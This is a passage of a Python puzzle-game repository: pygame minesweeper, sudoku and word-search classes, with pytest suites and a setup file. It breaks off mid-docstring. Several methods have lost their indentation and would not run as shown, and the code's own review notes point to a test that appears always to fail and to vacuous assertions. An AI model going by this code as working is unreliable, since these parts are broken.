            pygame.draw.rect(screen, black, [scale * 10, scale * 7 + quarterS, scale * 4, scale * 2 - halfS], chBorder)
            screen.blit(ch, chRect)
            frames += 1
            clock.tick(60)
            pygame.display.update()
        #pygame.display.update()
        pygame.quit()
# Launch the menu only when executed as a script; previously this ran on
# import too, which made the module unusable as a library/test target.
if __name__ == "__main__":
    game = Menu()
    game.chooseGame()
--- FILE SEPARATOR ---
import pygame
import time
import sys
from typing import List
import random
import numpy as np
# Fonts must be initialised before the module-level SysFont calls below.
pygame.font.init()
# Board pixel width (the board itself is square).
WIDTH = 800
# RGB palette used throughout this module.
WHITE = (255, 255, 255)
BLACK = (0,0,0)
GREY = (128, 128, 128)
RED = (255, 0, 0)
PURPLE = (255, 175, 255)
LIGHT_RED = (255, 175, 175)
ORANGE = (255, 200, 145)
# Pixel gap drawn between neighbouring squares.
GAP_SIZE = 1
# Height of the top/bottom button bars; also used to map clicks to cells.
SCALE = 40
font = pygame.font.SysFont('timesnewroman.ttc', 42)
small_font = pygame.font.SysFont('consola', 32)
class Square:
    """One cell of the minesweeper grid: value, pixel position and state."""

    def __init__(self, x, y, size):
        """Create an unrevealed, unmarked grey square at pixel (x, y)."""
        self.x, self.y, self.size = x, y, size
        self.fontsize = 42
        self.font = pygame.font.SysFont('timesnewroman.ttc', self.fontsize)
        self.revealed = False
        self.mark = False
        self.color = GREY

    def setValue(self, n):
        """Store the cell value (-1 = bomb) and pre-render its digit image."""
        self.value = n
        label = " " if n == 0 else str(n)
        self.img = font.render(label, True, BLACK)

    def getValue(self):
        """Return the stored cell value."""
        return self.value

    def reveal(self):
        """Mark the square revealed; returns False exactly when it is a bomb."""
        self.revealed = True
        self.color = WHITE
        return self.value != -1

    def draw(self, WIN):
        """Paint the square; its digit when revealed, a red dot when marked."""
        inner = (self.x + GAP_SIZE, self.y + GAP_SIZE + SCALE,
                 self.size - GAP_SIZE*2, self.size - GAP_SIZE*2)
        pygame.draw.rect(WIN, self.color, inner)
        if self.revealed:
            WIN.blit(self.img, (self.x + self.size/2 - 7, (self.y + self.size/2 - 13) + SCALE))
        elif self.mark:
            pygame.draw.circle(WIN, RED, (self.x + self.size/2, self.y + self.size/2 + SCALE), 15)
class Board:
    """Minesweeper grid: places bombs, computes neighbour counts and draws
    the end-of-game banner."""

    def __init__(self, rows, cols, bombs):
        """Create a rows x cols grid with `bombs` mines placed at random."""
        self.lose = False
        self.win = False
        font = pygame.font.SysFont('timesnewroman.ttc', 150)
        self.lossimg = font.render('YOU LOSE', True, BLACK)
        self.winimg = font.render('YOU WIN', True, BLACK)
        size = WIDTH//rows
        self.board: List[List[Square]] = [[Square(j*size, i*size, size) for j in range(cols)] for i in range(rows)]
        numSquares = rows*cols
        self.cols = cols
        self.rows = rows
        # Flat array of values: 0 for safe cells, -1 for bombs, shuffled.
        rand = np.zeros((1, numSquares - bombs))
        rand = np.concatenate((rand, -1 * np.ones((1, bombs))), axis = None)
        random.shuffle(rand)
        rand = rand.astype(int)
        for i in range(len(rand)):
            # BUG FIX: a flat index maps to a row via // cols; the old
            # int(i / rows) only worked because the game uses rows == cols.
            row = i // cols
            col = i % cols
            self.board[row][col].setValue(rand[i])

    def setSquares(self):
        """Replace every non-bomb value with its neighbouring-bomb count."""
        # BUG FIX: iterate rows on the first index and cols on the second;
        # the old loops swapped them, which only worked for square boards.
        for x in range(self.rows):
            for y in range(self.cols):
                if (self.board[x][y].getValue() != -1):
                    self.board[x][y].setValue(self.checkBombs(x,y))

    def checkBombs(self, x, y):
        """Count the bombs among the (up to 8) neighbours of (x, y)."""
        value = 0
        for i in range(-1,2):
            # Skip neighbour rows that fall off the board.
            if x + i < 0 or x + i > self.rows - 1:
                continue
            for j in range(-1,2):
                # Skip neighbour columns that fall off the board.
                if y + j < 0 or y + j > self.cols - 1:
                    continue
                if i == 0 and j == 0:
                    continue  # the square itself, not a neighbour
                if self.board[x+i][y+j].getValue() == -1:
                    value += 1
        return value

    def printBoard(self):
        """Debug helper: dump the numeric board to stdout."""
        # Loop variables renamed: the originals shadowed typing.List and
        # the Square class.
        for boardRow in self.board:
            for square in boardRow:
                print(square.getValue() , end = "")
                print(", " , end = "")
            print()

    def getSquare(self, x, y):
        """Return the Square at row x, column y."""
        return self.board[x][y]

    def draw(self, WIN):
        """Blit the win/lose banner onto the window when the game is over."""
        if self.lose:
            WIN.blit(self.lossimg, (150, WIDTH/2 -100))
        elif self.win:
            WIN.blit(self.winimg, (150, WIDTH/2 -100))
class Minesweeper:
    """Minesweeper game: fixed 20x20 board with 60 bombs."""
    # Counters kept at class level as defaults; an instance shadows them
    # with its own attribute on first assignment through self.
    numFlags = 0
    revealedSquares = 0
    def __init__(self):
        """Build the random board and pre-compute every neighbour count."""
        #rows = int(input("How many rows? "))
        rows = 20
        self.rows = rows
        cols = rows
        #bombs = int(input("How many bombs? "))
        self.bombs = 60
        # Number of safe squares; revealing them all wins the game.
        self.total = rows*cols - self.bombs
        self.board = Board(rows, cols, self.bombs)
        self.board.setSquares()
    def reveal(self, x, y): # take in clicked tile as parameter
        """Flood-reveal starting at (x, y).

        Reveals the square and counts it; when its value is 0 the reveal
        recurses into every unrevealed neighbour (neighbours of a 0 cell
        can never be bombs, so this is safe).
        """
        self.revealedSquares += 1
        curr = self.board.getSquare(x,y)
        if(curr.getValue() != 0):
            curr.reveal()
            return
        curr.reveal()
        for i in range(-1,2):
            if(x + i < 0):continue #Boundry Case
            elif (x + i == self.board.rows): continue #Boundry Case
            for j in range(-1,2):
                if(y + j < 0):continue #Boundry Case
                elif (y + j == self.board.cols): continue #Boundry Case
                curr = self.board.getSquare(x + i, y + j)
                if(curr.revealed):
                    continue
                self.reveal(x + i, y + j)
def findNode(self, pos, rows):
x,y = pos
squareSize = WIDTH//rows
row = (y - SCALE) // squareSize
col = x // squareSize
return [row,col]
def update_display(self, board, WIN):
for row in board.board:
for square in row:
square.draw(WIN)
if board.lose:
board.draw(WIN)
if board.win:
board.draw(WIN)
pygame.display.update()
    def playGame(self):
        """Run the minesweeper event/draw loop until the player quits.

        Left-click reveals, right-click toggles a flag; the top bar hosts a
        NEW GAME button and a timer, the bottom bar a BACK TO MENU button.
        A winning time faster than ms_high_score.txt is written back.
        """
        score_file = open("ms_high_score.txt", "r")
        score = score_file.read().splitlines() # read in the best time/high score
        score_file.close()
        HEIGHT = WIDTH + (SCALE * 2)
        WIN = pygame.display.set_mode((WIDTH, HEIGHT))
        pygame.display.set_caption("Minesweeper")
        frames = 0
        minutes = 0
        seconds = 0
        total_seconds = 0
        clock = pygame.time.Clock()
        running = True
        while running:
            # Timer only advances while the game is still undecided.
            if not self.board.lose and not self.board.win:
                total_seconds = frames // 60
                minutes = total_seconds // 60
                seconds = total_seconds % 60
                time = "{0:02}:{1:02}".format(minutes, seconds)
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                    pygame.quit()
                elif event.type == pygame.MOUSEBUTTONDOWN:
                    pos = pygame.mouse.get_pos()
                    tempCol = pos[0] // SCALE
                    tempRow = (pos[1] - SCALE) // SCALE
                    if event.button == 1:
                        # Left click inside the 20x20 board: reveal.
                        if (tempCol < 20 and tempCol >= 0) and (tempRow < 20 and tempRow >= 0):
                            [x,y] = self.findNode(pos, self.rows)
                            x = int(x)
                            y = int(y)
                            clicked = self.board.board[x][y]
                            if clicked.revealed == False and self.board.lose == False and self.board.win == False:
                                if clicked.reveal() == False:
                                    self.board.lose = True
                                self.reveal(x, y)
                                if self.revealedSquares == self.total:
                                    self.board.win = True
                        # NEW GAME button: reset all game state.
                        if (pos[0] < WIDTH // 2 and pos[0] >= 0) and (pos[1] < SCALE and pos[1] >= 0):
                            self.numFlags = 0
                            self.revealedSquares = 0
                            rows = 20
                            self.rows = rows
                            cols = rows
                            self.cols = rows
                            self.bombs = 60
                            self.total = rows*cols - self.bombs
                            self.board = Board(rows, cols, self.bombs)
                            self.board.setSquares()
                            frames = 0
                            minutes = 0
                            seconds = 0
                            total_seconds = 0
                        # BACK TO MENU button: leave the loop.
                        if (pos[0] < WIDTH and pos[0] >= 0) and (pos[1] < HEIGHT and pos[1] >= 21 * SCALE):
                            running = False
                    # Right click: toggle a flag on an unrevealed square.
                    if event.button == 3 and self.board.lose == False and self.board.win == False:
                        [x,y] = self.findNode(pos, self.rows)
                        x = int(x)
                        y = int(y)
                        clicked = self.board.board[x][y]
                        if clicked.revealed == False:
                            if clicked.mark == False and self.numFlags < self.bombs:
                                clicked.mark = True
                                self.numFlags += 1
                            elif clicked.mark:
                                clicked.mark = False
                                self.numFlags -= 1
                # Visual change for buttons being clicked
                else:
                    pygame.display.update()
                    frames += 1
                    clock.tick(60)
            # Buttons
            # New game button
            new = small_font.render("NEW GAME", True, BLACK, LIGHT_RED)
            newRect = new.get_rect()
            newRect.center = (WIDTH // 4, SCALE // 2)
            pygame.draw.rect(WIN, LIGHT_RED, [0, 0, WIDTH // 2, SCALE])
            WIN.blit(new, newRect)
            # Timer
            timer = small_font.render(time, True, BLACK, ORANGE)
            timerRect = timer.get_rect()
            timerRect.center = (3 * (WIDTH // 4), SCALE // 2)
            pygame.draw.rect(WIN, ORANGE, [WIDTH // 2, 0, WIDTH // 2, SCALE])
            WIN.blit(timer, timerRect)
            # Back to menu button
            menu = small_font.render("BACK TO MENU", True, BLACK, PURPLE)
            menuRect = menu.get_rect()
            menuRect.center = (WIDTH // 2, (21 * SCALE) + (SCALE // 2))
            pygame.draw.rect(WIN, PURPLE, [0, 21 * SCALE, WIDTH, SCALE])
            WIN.blit(menu, menuRect)
            if self.board.win:
                text = "{0:02}:{1:02}".format(int(score[0]), int(score[1]))
                # New best time: persist it and show the fresh value.
                if int(score[0]) > minutes or (int(score[0]) >= minutes and int(score[1]) > seconds):
                    with open("ms_high_score.txt", "w") as out:
                        out.write("{}\n{}".format(str(minutes), str(seconds)))
                    text = "{0:02}:{1:02}".format(minutes, seconds)
                # NOTE(review): score_file was already closed above; this
                # second close is a harmless no-op.
                score_file.close()
                time = "Puzzle complete! Best time: " + text
            frames += 1
            clock.tick(60)
            pygame.display.update()
            self.update_display(self.board, WIN)
--- FILE SEPARATOR ---
# Test suite for minesweeper game
import pytest
import minesweeper
@pytest.fixture
def getMinesweeper():
    """Fresh Minesweeper instance (random 20x20 board, 60 bombs)."""
    return minesweeper.Minesweeper()
def test_reveal(getMinesweeper):
    """reveal() on square (1, 1) is expected to return True.

    NOTE(review): the board is random, so (1, 1) can be a bomb; reveal()
    then returns False, making this test flaky.
    """
    x = 1
    y = 1
    result = getMinesweeper.board.board[x][y].reveal()
    expected = True
    assert result == expected
def test_find_node(getMinesweeper):
    """findNode on pixel (0, 0) is expected to map to board cell [0, 0].

    NOTE(review): findNode subtracts the SCALE header offset from y, so
    pixel (0, 0) maps to [-1, 0] — this assertion appears to always fail;
    verify the intended coordinate convention.
    """
    x = 0
    y = 0
    rows = getMinesweeper.rows
    result = getMinesweeper.findNode([x, y], rows)
    expected = [0,0]
    assert result == expected
--- FILE SEPARATOR ---
# Minimal packaging configuration: installs every package find_packages()
# discovers under the repository root.
from setuptools import setup, find_packages
setup(name="PuzzlePack", packages=find_packages())
--- FILE SEPARATOR ---
# Sudoku class
import random
import numpy as np
import pygame
import copy
import sys
# Needs to fill the board up following Sudoku rules
# Remove a number and check if the board still has just one unique solution
# Do this using a fact backtracking algorithm
# If there is now more than one solution, don't remove this number, try another
class Sudoku:
    """Sudoku puzzle generator plus a pygame front-end (playGame)."""
    def __init__(self):
        """Set up generator state; the real work happens in generateGame()."""
        # NOTE(review): `size` is never read by any method visible here.
        self.size = 36
        # Digit domain used when computing cell candidates.
        self.numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
        # Solution counter used by checkRemove; reset by removeNum.
        self.solutions = 0
        # Completed grid saved by generateGame for answer checking.
        self.answer = np.zeros([9, 9], dtype=np.int32)
def printClass(self):
return "This is the Sudoku class."
# Check if there is just one solution to the board
def checkRemove(self, board, optBoard):
if self.solutions > 1:
return False
if np.all(num > 0 for num in board):
self.solutions += 1
optBoard = self.getOptBoard(board, optBoard)
lowPair = self.findLowOpt(optBoard)
x, y = lowPair
options = optBoard[x][y]
for nums in options:
if len(options) > 0:
board[x][y] = num
sys.setrecursionlimit(2600)
if self.checkRemove(board, optBoard):
return True
board[x][y] = 0
if self.solutions == 1:
return True
return False
# Remove a number from the board
def removeNum(self, x, y, board, optBoard):
board[x][y] = 0
self.solutions = 0
if self.checkRemove(board, optBoard):
return board
else:
locX = random.randint(0, 8)
locY = random.randint(0, 8)
return self.removeNum(locX, locY, board, optBoard)
# Recursive backtracking algorithm to fill the board all the way
# following sudoku rules
def fillBoard(self, x, y, board):
if y >= 9 and x < 8:
x += 1
y = 0
if x >= 8 and y >= 9:
return True
options = self.getOpts(x, y, board)
random.shuffle(options)
for num in options:
if len(options) > 0:
board[x][y] = num
sys.setrecursionlimit(2600)
if self.fillBoard(x, y+1, board):
return True
board[x][y] = 0
return False
def getOpts(self, x, y, board):
row = board[x, :]
col = board[:, y]
cell = self.getCell(x, y, board)
nonOpts = np.union1d(row, col)
nonOpts = np.union1d(nonOpts, cell)
options = np.setdiff1d(self.numbers, nonOpts)
return options
def getOptBoard(self, board, optBoard):
for x in range(0, 9):
for y in range(0, 9):
optBoard[x][y] = self.getOpts(x, y, board)
return optBoard
def findLowOpt(self, optBoard):
row = -1
col = -1
lowest = 9
lowPair = (row, col)
for x in range(0, 9):
for y in range(0, 9):
if len(optBoard[x][y]) < lowest:
lowest = len(optBoard[x][y])
lowPair = (x, y)
return lowPair
def getCell(self, x, y, board):
cell = np.zeros([0], dtype=np.int32)
# Cell 1
if(x >= 0 and x <= 2 and y >= 0 and y <= 2):
cell = np.concatenate((cell, board[0, 0:3]))
cell = np.concatenate((cell, board[1, 0:3]))
cell = np.concatenate((cell, board[2, 0:3]))
# Cell 2
elif(x >= 3 and x <= 5 and y >= 0 and y <= 2):
cell = np.concatenate((cell, board[3, 0:3]))
cell = np.concatenate((cell, board[4, 0:3]))
cell = np.concatenate((cell, board[5, 0:3]))
# Cell 3
elif(x >= 6 and x <= 8 and y >= 0 and y <= 2):
cell = np.concatenate((cell, board[6, 0:3]))
cell = np.concatenate((cell, board[7, 0:3]))
cell = np.concatenate((cell, board[8, 0:3]))
# Cell 4
elif(x >= 0 and x <= 2 and y >= 3 and y <= 5):
cell = np.concatenate((cell, board[0, 3:6]))
cell = np.concatenate((cell, board[1, 3:6]))
cell = np.concatenate((cell, board[2, 3:6]))
# Cell 5
elif(x >= 3 and x <= 5 and y >= 3 and y <= 5):
cell = np.concatenate((cell, board[3, 3:6]))
cell = np.concatenate((cell, board[4, 3:6]))
cell = np.concatenate((cell, board[5, 3:6]))
# Cell 6
elif(x >= 6 and x <= 8 and y >= 3 and y <= 5):
cell = np.concatenate((cell, board[6, 3:6]))
cell = np.concatenate((cell, board[7, 3:6]))
cell = np.concatenate((cell, board[8, 3:6]))
# Cell 7
elif(x >= 0 and x <= 2 and y >= 6 and y <= 8):
cell = np.concatenate((cell, board[0, 6:9]))
cell = np.concatenate((cell, board[1, 6:9]))
cell = np.concatenate((cell, board[2, 6:9]))
# Cell 8
elif(x >= 3 and x <= 5 and y >= 6 and y <= 8):
cell = np.concatenate((cell, board[3, 6:9]))
cell = np.concatenate((cell, board[4, 6:9]))
cell = np.concatenate((cell, board[5, 6:9]))
# Cell 9
elif(x >= 6 and x <= 8 and y >= 6 and y <= 8):
cell = np.concatenate((cell, board[6, 6:9]))
cell = np.concatenate((cell, board[7, 6:9]))
cell = np.concatenate((cell, board[8, 6:9]))
return cell
    # Set up the board and begin the algorithm
    def generateGame(self):
        """Build a complete grid, remember it in self.answer, then blank cells.

        Returns the playable board; self.answer keeps the full solution.
        """
        board = np.zeros([9, 9], dtype=np.int32)
        # Fill the array with -'s as placeholders
        # NOTE(review): redundant — np.zeros already initialises every cell to 0.
        for row in range(0, 9):
            for col in range(0, 9):
                board[row][col] = 0
        x = 0
        y = 0
        self.fillBoard(x, y, board)
        self.answer = copy.deepcopy(board)
        optBoard = np.zeros([9, 9], dtype=object)
        optBoard = self.getOptBoard(board, optBoard)
        # 45 removal attempts; the random cell may repeat, so the final
        # puzzle can have fewer than 45 blanks.
        for i in range(0, 45):
            locX = random.randint(0, 8)
            locY = random.randint(0, 8)
            self.removeNum(locX, locY, board, optBoard)
        return board
    def playGame(self):
        """Run the sudoku UI loop: board grid, CHECK/CLEAR/NEW buttons, timer.

        Clicking an empty cell arms keyboard entry for that cell; the win
        condition compares the working grid against self.answer, and a
        faster time than sudoku_high_score.txt is written back.
        """
        board = self.generateGame()
        temp = copy.deepcopy(board)
        score_file = open("sudoku_high_score.txt", "r")
        score = score_file.read().splitlines() # read in the best time/high score
        score_file.close()
        # Pygame initializations
        pygame.init()
        pygame.display.set_caption('Sudoku Game')
        scale = 50
        width = scale * 9
        height = scale * 11
        twiceS = scale * 2
        halfS = scale // 2
        halfW = width // 2
        quarterW = width // 4
        eighthW = width // 8
        running = True
        win = False
        frames = 0
        minutes = 0
        seconds = 0
        total_seconds = 0
        screen = pygame.display.set_mode((width, height))
        clock = pygame.time.Clock()
        font = pygame.font.SysFont("consola", 40)
        small_font = pygame.font.SysFont("consola", 24)
        # Colors
        white = (255, 255, 255)
        grey = (200, 200, 200)
        dark_grey = (175, 175, 175)
        black = (0, 0, 0)
        light_red = (255, 175, 175)
        dark_red = (230, 150, 150)
        light_orange = (255, 200, 145)
        light_yellow = (255, 255, 200)
        light_green = (200, 255, 200)
        light_blue = (200, 200, 255)
        dark_blue = (175, 175, 230)
        light_purple = (255, 175, 255)
        light_pink = (255, 200, 200)
        light_brown = (200, 150, 100)
        # Default colors
        number_color = white
        select_color = grey
        check_color = grey
        clear_color = light_blue
        new_color = light_red
        # Textbox input
        active = False
        text = ""
        selX = -1
        selY = -1
        selected = (selX, selY)
        checked = False
        correct = 0
        while running:
            # Variables for calculating time
            if not win:
                total_seconds = frames // 60
                minutes = total_seconds // 60
                seconds = total_seconds % 60
                time = "{0:02}:{1:02}".format(minutes, seconds)
            # Actions/events from input
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                    pygame.quit()
                elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
                    # User clicks the mouse. Get the position
                    pos = pygame.mouse.get_pos()
                    # Change the x/y screen coordinates to grid coordinates
                    column = pos[0] // scale
                    row = (pos[1] - scale) // scale
                    selY = column
                    selX = row
                    # Action for numbers being selected
                    if (column < 9 and column >= 0) and (row < 9 and row >= 0) and not win and board[selX][selY] == 0:
                        active = True
                        if (selX, selY) != selected:
                            selected = (selX, selY)
                        else:
                            selected = (-1, -1)
                    else:
                        active = False
                        selected = (-1, -1)
                    # Action for check numbers buttton pressed
                    if (pos[0] < quarterW and pos[0] >= 0) and (pos[1] < scale and pos[1] >= 0) and not win:
                        check_color = dark_grey
                        checked = True
                        selected = (-1, -1)
                    # Action for clear all buttton pressed
                    if (pos[0] < halfW and pos[0] >= quarterW) and (pos[1] < scale and pos[1] >= 0) and not win:
                        clear_color = dark_blue
                        temp = copy.deepcopy(board)
                        correct = 0
                        checked = False
                    # Action for new game button; resets all variables, game board, etc.
                    if (pos[0] < quarterW * 3 and pos[0] >= halfW) and (pos[1] < scale and pos[1] >= 0):
                        win = False
                        board = self.generateGame()
                        temp = copy.deepcopy(board)
                        score_file = open("sudoku_high_score.txt", "r")
                        score = score_file.read().splitlines() # read in the best time/high score
                        score_file.close()
                        frames = 0
                        minutes = 0
                        seconds = 0
                        total_seconds = 0
                        selected = (-1, -1)
                        active = False
                        text = ""
                        new_color = dark_red
                        checked = False
                        correct = 0
                    # Action for back to menu button
                    if (pos[0] < width and pos[0] >= 0) and (pos[1] < height and pos[1] >= scale * 10):
                        running = False
                elif event.type == pygame.KEYDOWN:
                    if active:
                        if event.key == pygame.K_RETURN:
                            text = ''
                        elif event.key == pygame.K_BACKSPACE:
                            text = text[:-1]
                        else:
                            # NOTE(review): int(text) raises ValueError when a
                            # non-digit key is typed into an active cell —
                            # presumably only digits are expected; verify.
                            text = event.unicode
                            if board[selX][selY] == 0:
                                temp[selX][selY] = int(text)
                            text = ""
                            active = False
                            selected = (-1, -1)
                # Visual change for buttons being clicked
                else:
                    check_color = grey
                    clear_color = light_blue
                    new_color = light_red
                    pygame.display.update()
                    frames += 1
                    clock.tick(60)
            # Displaying everything on the screen
            screen.fill(white)
            # Display the board
            for row in range(0, 9):
                for col in range(0, 9):
                    if (row, col) == selected:
                        number_color = light_yellow
                    elif checked:
                        if temp[row][col] == self.answer[row][col]:
                            number_color = light_green
                            # NOTE(review): `correct` keeps accumulating every
                            # frame while `checked` stays True.
                            correct += 1
                        else:
                            number_color = light_red
                    elif temp[row][col] != 0 and board[row][col] == 0:
                        number_color = select_color
                    else:
                        number_color = white
                    num = str(temp[row][col])
                    if temp[row][col] == 0:
                        num = " "
                    number = font.render(num, True, black, number_color)
                    numberRect = number.get_rect()
                    numberRect.center = (col * scale + halfS, row * scale + (scale + halfS))
                    pygame.draw.rect(screen, number_color, [scale * col, scale * row + scale, scale, scale])
                    screen.blit(number, numberRect)
                    # Box borders
                    pygame.draw.rect(screen, black, [scale * col, scale * row + scale, scale, scale], width=1)
            # 3x3 cell borders
            pygame.draw.rect(screen, black, [(scale * 3), scale-1, (scale * 3)+1, (scale * 9)+1], width=2)
            pygame.draw.rect(screen, black, [0-1, (scale * 4), (scale * 9)+1, (scale * 3)+1], width=2)
            # Check word and clear buttons
            check = small_font.render("CHECK", True, black, check_color)
            answer = small_font.render("ANSWER", True, black, check_color)
            checkRect = check.get_rect()
            checkRect.center = (eighthW, halfS // 1.5)
            answerRect = answer.get_rect()
            answerRect.center = (eighthW, halfS + (halfS // 2))
            pygame.draw.rect(screen, check_color, [0, 0, quarterW, scale])
            screen.blit(check, checkRect)
            screen.blit(answer, answerRect)
            clear = small_font.render("CLEAR", True, black, clear_color)
            allWord = small_font.render("ALL", True, black, clear_color)
            clearRect = clear.get_rect()
            clearRect.center = (3 * (eighthW), halfS // 1.5)
            allRect = allWord.get_rect()
            allRect.center = (3 * (eighthW), halfS + (halfS // 2))
            pygame.draw.rect(screen, clear_color, [quarterW, 0, halfW, scale])
            screen.blit(clear, clearRect)
            screen.blit(allWord, allRect)
            # New game button and timer
            new = small_font.render("NEW", True, black, new_color)
            gameWord = small_font.render("GAME", True, black, new_color)
            newRect = new.get_rect()
            newRect.center = (5 * (eighthW), halfS // 1.5)
            gameRect = gameWord.get_rect()
            gameRect.center = (5 * (eighthW), halfS + (halfS // 2))
            pygame.draw.rect(screen, new_color, [halfW, 0, quarterW * 3, scale])
            screen.blit(new, newRect)
            screen.blit(gameWord, gameRect)
            timer = font.render(time, True, black, light_orange)
            timerRect = timer.get_rect()
            timerRect.center = (7 * (eighthW), halfS)
            pygame.draw.rect(screen, light_orange, [quarterW * 3, 0, width, scale])
            screen.blit(timer, timerRect)
            # Back to menu button
            menu = small_font.render("BACK TO MENU", True, black, light_purple)
            menuRect = menu.get_rect()
            menuRect.center = (width // 2, (10 * scale) + (scale // 2))
            pygame.draw.rect(screen, light_purple, [0, 10 * scale, width, scale])
            screen.blit(menu, menuRect)
            # Win condition
            if np.all(temp == self.answer):
                win = True
                text = "{0:02}:{1:02}".format(int(score[0]), int(score[1]))
                if int(score[0]) > minutes or (int(score[0]) >= minutes and int(score[1]) > seconds):
                    with open("sudoku_high_score.txt", "w") as out:
                        out.write("{}\n{}".format(str(minutes), str(seconds)))
                    text = "{0:02}:{1:02}".format(minutes, seconds)
                # NOTE(review): score_file is already closed; this is a no-op.
                score_file.close()
                complete = small_font.render("Puzzle complete! Best time: " + text, True, black, light_orange)
                completeRect = complete.get_rect()
                completeRect.center = (width // 2, (10 * scale) + (scale // 2))
                pygame.draw.rect(screen, light_orange, [0, 10 * scale, width, height])
                screen.blit(complete, completeRect)
            frames += 1
            clock.tick(60)
            pygame.display.update()
--- FILE SEPARATOR ---
# Test suite for Sudoku game
import pytest
import numpy as np
import sudoku
@pytest.fixture
def getSudoku():
    """Fresh Sudoku generator instance."""
    return sudoku.Sudoku()
# Arrange, get a blank board
@pytest.fixture
def getBoard(getSudoku):
    """9x9 int32 array of zeros.

    NOTE(review): pytest caches a fixture per test, so two parameters
    resolving to getBoard inside one test receive the SAME array object.
    """
    board = np.zeros([9, 9], dtype=np.int32)
    # Fill the array with -'s as placeholders
    for row in range(0, 9):
        for col in range(0, 9):
            board[row][col] = 0
    return board
# Arrange, get a filled board
@pytest.fixture
def getTestBoard(getSudoku):
    """A known, fully solved 9x9 grid."""
    board = np.zeros([9, 9], dtype=np.int32)
    temp = [[9, 7, 8, 1, 3, 2, 4, 5, 6],
            [4, 1, 5, 6, 8, 9, 3, 2, 7],
            [2, 3, 6, 5, 7, 4, 1, 9, 8],
            [7, 6, 2, 4, 5, 8, 9, 3, 1],
            [1, 4, 3, 9, 6, 7, 2, 8, 5],
            [8, 5, 9, 3, 2, 1, 7, 6, 4],
            [5, 2, 7, 8, 1, 3, 6, 4, 9],
            [6, 9, 1, 2, 4, 5, 8, 7, 3],
            [3, 8, 4, 7, 9, 6, 5, 1, 2]]
    # Fill the array with -'s as placeholders
    for row in range(0, 9):
        for col in range(0, 9):
            board[row][col] = temp[row][col]
    return board
# Arrange, get a blank board
@pytest.fixture
def getTestOptBoard(getSudoku):
    """9x9 object array whose cells each hold a one-element int array."""
    board = np.zeros([9, 9], dtype=object)
    # Fill the array with -'s as placeholders
    for row in range(0, 9):
        for col in range(0, 9):
            board[row][col] = np.zeros([1], dtype=np.int32)
    return board
def test_printClass(getSudoku):
    """printClass returns its fixed identification string."""
    result = getSudoku.printClass()
    test = "This is the Sudoku class."
    assert result == test
def test_checkRemove(getSudoku, getTestBoard, getTestOptBoard):
    """A fully solved board counts as having a (single) solution."""
    result = getSudoku.checkRemove(getTestBoard, getTestOptBoard)
    assert result
def test_removeNum(getSudoku, getTestBoard, getTestOptBoard):
    """removeNum blanks a cell and returns the same board object.

    NOTE(review): `test` aliases the fixture array that removeNum already
    mutated, so this comparison is result-vs-itself.
    """
    result = getSudoku.removeNum(0, 0, getTestBoard, getTestOptBoard)
    test = getTestBoard
    test[0][0] = 0
    assert np.array_equal(result, test)
def test_fillBoard(getSudoku, getBoard):
    """fillBoard should change every cell of a blank board.

    NOTE(review): `temp` and `test` are the same cached fixture object, and
    `is not` between numpy element scalars is an identity check on fresh
    objects — these assertions are effectively vacuous; verify intent.
    """
    temp = getBoard
    getSudoku.fillBoard(0, 0, temp)
    test = getBoard
    for row in range(0, 9):
        for col in range(0, 9):
            assert temp[row][col] is not test[row][col]
def test_generateGame(getSudoku, getBoard):
    """generateGame should return a board differing from a blank one.

    NOTE(review): same `is not` identity-check concern as test_fillBoard.
    """
    result = getSudoku.generateGame()
    test = getBoard
    for row in range(0, 9):
        for col in range(0, 9):
            assert result[row][col] is not test[row][col]
--- FILE SEPARATOR ---
# Word search class
import random
import numpy as np
import pygame
import copy
import sys
class WordSearch:
def __init__(self):
self.size = 17
self.numberOfWords = 25
self.letters = ["A", "B", "C", "D", "E",
"F", "G", "H", "I", "J",
"K", "L", "M", "N", "O",
"P", "Q", "R", "S", "T",
"U", "V", "W", "X", "Y", "Z"]
self.textFile = open("words.txt", "r")
self.wordsList = self.textFile.read().splitlines()
self.usedWords = []
self.directions = ["NW", "N", "NE",
"W", "E",
"SW", "S", "SE"]
def printClass(self):
return "This is the word search class."
    def checkWord(self, word, x, y, dir, board):
        """Return True when *word* can be placed at (x, y) heading *dir*.

        A letter may land on a '-' placeholder or on an identical letter
        (crossings allowed); each word may be used once.

        NOTE(review): the cells are indexed BEFORE the bounds terms are
        evaluated, so a word running off the low edge reads negative
        indices, which wrap to the far side of the board in Python —
        verify whether that is intended.  Also the bounds compare against
        len(word) rather than len(word) - 1, rejecting some placements
        that would actually fit.
        """
        if word in self.usedWords:
            return False
        for i in range(0, len(word)):
            if (dir == "NW" and (board[x-i][y-i] == "-" or board[x-i][y-i] == word[i:i+1]) and
                x - len(word) > 0 and y - len(word) > 0):
                continue
            elif (dir == "N" and (board[x][y-i] == "-" or board[x][y-i] == word[i:i+1]) and
                  y - len(word) > 0):
                continue
            elif (dir == "NE" and (board[x+i][y-i] == "-" or board[x+i][y-i] == word[i:i+1]) and
                  x + len(word) < self.size and y - len(word) > 0):
                continue
            elif (dir == "W" and (board[x-i][y] == "-" or board[x-i][y] == word[i:i+1]) and
                  x - len(word) > 0):
                continue
            elif (dir == "E" and (board[x+i][y] == "-" or board[x+i][y] == word[i:i+1]) and
                  x + len(word) < self.size):
                continue
            elif (dir == "SW" and (board[x-i][y+i] == "-" or board[x-i][y+i] == word[i:i+1]) and
                  x - len(word) > 0 and y+ len(word) < self.size):
                continue
            elif (dir == "S" and (board[x][y+i] == "-" or board[x][y+i] == word[i:i+1]) and
                  y + len(word) < self.size):
                continue
            elif (dir == "SE" and (board[x+i][y+i] == "-" or board[x+i][y+i] == word[i:i+1]) and
                  x + len(word) < self.size and y + len(word) < self.size):
                continue
            else:
                return False
        return True
def fillWord(self, word, x, y, dir, board):
for i in range(0, len(word)):
if dir == "NW":
board[x-i][y-i] = word[i:i+1]
elif dir == "N":
board[x][y-i] = word[i:i+1]
elif dir == "NE":
board[x+i][y-i] = word[i:i+1]
elif dir == "W":
board[x-i][y] = word[i:i+1]
elif dir == "E":
board[x+i][y] = word[i:i+1]
elif dir == "SW":
board[x-i][y+i] = word[i:i+1]
elif dir == "S":
board[x][y+i] = word[i:i+1]
elif dir == "SE":
board[x+i][y+i] = word[i:i+1]
return board
    def addWord(self, word, x, y, dir, board):
        """Place *word* at (x, y, dir) if legal, else retry recursively.

